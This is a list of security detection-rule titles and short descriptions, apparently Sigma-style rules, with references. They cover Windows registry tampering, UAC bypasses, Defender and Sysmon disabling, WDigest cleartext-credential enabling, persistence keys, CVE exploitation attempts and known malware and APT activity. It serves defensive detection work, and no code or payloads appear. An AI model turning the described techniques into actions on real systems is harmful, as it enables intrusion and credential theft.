Hiding User Account Via SpecialAccounts Registry Key Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen. https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
Activate Suppression of Windows Security Center Notifications Detects Notification_Suppress being set to 1 to disable Windows Security Center notifications https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Suspicious Environment Variable Has Been Registered Detects the creation of user-specific or system-wide environment variables via the registry that contain suspicious commands and strings https://infosec.exchange/@sbousseaden/109542254124022664
Suspicious Keyboard Layout Load Detects the keyboard preload installation with a suspicious keyboard layout, e.g. a Chinese, Iranian or Vietnamese layout loaded in a user session on systems maintained by US staff only https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index, https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
Potential PendingFileRenameOperations Tampering Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot. https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6, https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN, https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html, https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
Suspicious Printer Driver Empty Manufacturer Detects a suspicious printer driver installation with an empty Manufacturer value https://twitter.com/SBousseaden/status/1410545674773467140
Registry Persistence via Explorer Run Key Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/
New RUN Key Pointing to Suspicious Folder Detects suspicious new RUN key element pointing to an executable in a suspicious folder https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
Suspicious Service Installed Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
Modify User Shell Folders Startup Value Detects modification of the startup key to a path where a payload could be stored to be launched during startup https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md
Enable LM Hash Storage Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
Scheduled TaskCache Change by Uncommon Program Monitors the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://labs.f-secure.com/blog/scheduled-task-tampering/
Potential Registry Persistence Attempt Via Windows Telemetry Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
RDP Sensitive Settings Changed to Zero Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'. https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services
RDP Sensitive Settings Changed Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'. https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services, https://blog.sekoia.io/darkgate-internals/, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry
New TimeProviders Registered With Uncommon DLL Name Detects processes setting a new DLL in the DllName value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md
Old TLS1.0/TLS1.1 Protocol Version Enabled Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947
COM Hijacking via TreatAs Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md, https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s
Potential Signing Bypass Via Windows Developer Features - Registry Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allows the user to install untrusted packages. https://twitter.com/malmoeb/status/1560536653709598721, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
UAC Bypass via Event Viewer Detects UAC bypass method using Windows event viewer https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100
UAC Bypass via Sdclt Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/, https://github.com/hfiref0x/UACME
UAC Bypass Abusing Winsat Path Parsing - Registry Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) https://github.com/hfiref0x/UACME
UAC Bypass Using Windows Media Player - Registry Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) https://github.com/hfiref0x/UACME
UAC Disabled Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
UAC Notification Disabled Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed. https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md, https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/
UAC Secure Desktop Prompt Disabled Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
VBScript Payload Stored in Registry Detects VBScript content stored into registry keys as seen being used by UNC2452 group https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
Wdigest Enable UseLogonCredential Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html, https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649, https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials
Execution DLL of Choice Using WAB.EXE Detects when the path to the DLL written in the registry differs from the default one. When launched, WAB.exe tries to load the DLL from the registry. https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml, https://twitter.com/Hexacorn/status/991447379864932352, http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Disable Windows Defender Functionalities Via Registry Keys Detects when attackers or tools disable Windows Defender functionalities via the Windows registry https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html, https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html, https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html, https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/
Winget Admin Settings Modification Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget, https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13
Enable Local Manifest Installation With Winget Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests. https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Winlogon Notify Key Logon Persistence Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell
Winlogon AllowMultipleTSSessions Enable Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be opened at once. This is often used by attackers as a way to connect to an RDP session without disconnecting the other users http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Sysmon Configuration Change Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or of someone trying to manipulate the configuration https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Sysmon Configuration Error Detects when an adversary is trying to hide its actions from Sysmon logging, based on error messages https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
Sysmon Configuration Modification Detects when an attacker tries to hide from Sysmon by disabling or stopping it https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
Sysmon Blocked Executable Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy. https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e
Sysmon Blocked File Shredding Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Sysmon File Executable Creation Detected Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon, https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36
WMI Event Subscription Detects the creation of a WMI event subscription, a common persistence method https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected
Suspicious Scripting in a WMI Consumer Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/, https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19, https://github.com/RiccardoAncarani/LiquidSnake
Suspicious Encoded Scripts in a WMI Consumer Detects suspicious encoded payloads in WMI Event Consumers https://github.com/RiccardoAncarani/LiquidSnake
Rejetto HTTP File Server RCE Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287 https://vk9-sec.com/hfs-code-execution-cve-2014-6287/, https://www.exploit-db.com/exploits/39161, https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md
CVE-2010-5278 Exploitation Attempt MODx manager - Local File Inclusion: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. https://github.com/projectdiscovery/nuclei-templates
ZxShell Malware Detects the start of ZxShell via the well-known function name it is called with https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100, https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf
Turla Group Lateral Movement Detects automated lateral movement by Turla group https://securelist.com/the-epic-turla-operation/65545/
Turla Group Commands May 2020 Detects commands used by Turla group as reported by ESET in May 2020 https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
Exploit for CVE-2015-1641 Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/, https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
Exploit for CVE-2017-0261 Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
Droppers Exploiting CVE-2017-11882 Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100, https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-, https://github.com/embedi/CVE-2017-11882
Exploit for CVE-2017-8759 Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100, https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
Adwind RAT / JRAT Detects javaw.exe in AppData folder as used by Adwind / JRAT https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
CosmicDuke Service Installation Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence. https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
Fireball Archer Install Detects Archer malware invocation via rundll32 https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/, https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100
Malware Shellcode in Verclsid Target Process Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro https://twitter.com/JohnLaTwC/status/837743453039534080
NotPetya Ransomware Activity Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil https://securelist.com/schroedingers-petya/78870/, https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
Potential PlugX Activity Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/
StoneDrill Service Install This method detects a service install of the malicious "Microsoft Network Realtime Inspection Service" service described in the StoneDrill report by Kaspersky https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
WannaCry Ransomware Activity Detects WannaCry ransomware activity https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
Potential APT10 Cloud Hopper Activity Detects potential process and execution activity related to APT10 Cloud Hopper operation https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
Ps.exe Renamed SysInternals Tool Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report https://www.us-cert.gov/ncas/alerts/TA17-293A
Equation Group C2 Communication Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195
Lazarus System Binary Masquerading Detects binaries used by the Lazarus group which use system binary names but are executed and launched from a non-default location https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
Turla Group Named Pipes Detects a named pipe used by Turla group samples Internal Research, https://attack.mitre.org/groups/G0010/
Turla Service Install This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
Turla PNG Dropper Service This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/
Fortinet CVE-2018-13379 Exploitation Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
Oracle WebLogic Exploit Detects access to a webshell dropped into a keystore folder on the WebLogic server https://twitter.com/pyn3rd/status/1020620932967223296, https://github.com/LandGrey/CVE-2018-2894
Elise Backdoor Activity Detects Elise backdoor activity used by APT32 https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting, https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf
APT27 - Emissary Panda Activity Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965, https://twitter.com/cyb3rops/status/1168863899531132929, https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
Sofacy Trojan Loader Activity Detects Trojan loader activity as used by APT28 https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/, https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110, https://twitter.com/ClearskySec/status/960924755355369472
APT29 2018 Phishing Campaign File Indicators Detects indicators of the APT 29 (Cozy Bear) phishing campaign as reported by Mandiant https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
APT29 2018 Phishing Campaign CommandLine Indicators Detects indicators of the APT 29 (Cozy Bear) phishing campaign as reported by Mandiant https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
OceanLotus Registry Activity Detects registry keys created in OceanLotus (also known as APT32) attacks https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/, https://github.com/eset/malware-ioc/tree/master/oceanlotus
Potential MuddyWater APT Activity Detects potential Muddywater APT activity https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign
OilRig APT Activity Detects OilRig activity as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
OilRig APT Registry Persistence Detects OilRig registry persistence as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
OilRig APT Schedule Task Persistence - Security Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
OilRig APT Schedule Task Persistence - System Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
Defrag Deactivation Detects the deactivation and disabling of the scheduled defragmentation task, as seen in Slingshot APT group activity https://securelist.com/apt-slingshot/84312/
Defrag Deactivation - Security Detects the deactivation and disabling of the scheduled defragmentation task, as seen in Slingshot APT group activity https://securelist.com/apt-slingshot/84312/
TropicTrooper Campaign November 2018 Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
Potential BearLPE Exploitation Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp
Pulse Secure Attack CVE-2019-11510 Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole https://www.exploit-db.com/exploits/47297
Exploiting SetupComplete.cmd CVE-2019-1378 Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua
Citrix Netscaler Attack CVE-2019-19781 Detects CVE-2019-19781 exploitation attempts against Citrix Netscaler, Application Delivery Controller and Citrix Gateway https://support.citrix.com/article/CTX267679, https://support.citrix.com/article/CTX267027, https://isc.sans.edu/diary/25686, https://twitter.com/mpgn_x64/status/1216787131210829826, https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md
Exploiting CVE-2019-1388 Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388, https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
Potential Baby Shark Malware Activity Detects activity that could be related to Baby Shark malware https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
Confluence Exploitation CVE-2019-3398 Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398 https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181
Chafer Malware URL Pattern Detects HTTP request used by Chafer malware to receive data from its C2. https://securelist.com/chafer-used-remexi-malware/89538/
Potential Dridex Activity Detects potential Dridex activity via specific process patterns https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3, https://redcanary.com/threat-detection-report/threats/dridex/
Potential Dtrack RAT Activity Detects potential Dtrack RAT activity via specific process patterns https://securelist.com/my-name-is-dtrack/93338/, https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/, https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/, https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/, https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/
Potential Emotet Activity Detects all Emotet like process executions that are not covered by the more generic rules https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/, https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/, https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/, https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/
Formbook Process Creation Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which then execute a special command line to delete the dropper from the AppData Temp folder. False positives are avoided by excluding all parent processes with command line parameters. https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer, https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/, https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/, https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/
LockerGoga Ransomware Activity Detects LockerGoga ransomware activity via specific command line. https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a, https://blog.f-secure.com/analysis-of-lockergoga-ransomware/, https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
Potential QBot Activity Detects potential QBot activity by looking for process executions used previously by QBot https://twitter.com/killamjr/status/1179034907932315648, https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
Potential Ryuk Ransomware Activity Detects Ryuk ransomware activity https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/, https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
Potential Snatch Ransomware Activity Detects specific process characteristics of Snatch ransomware word document droppers https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
Ursnif Malware C2 URL Pattern Detects Ursnif C2 traffic. https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html
Ursnif Malware Download URL Pattern Detects download of Ursnif malware done by dropper documents. https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware
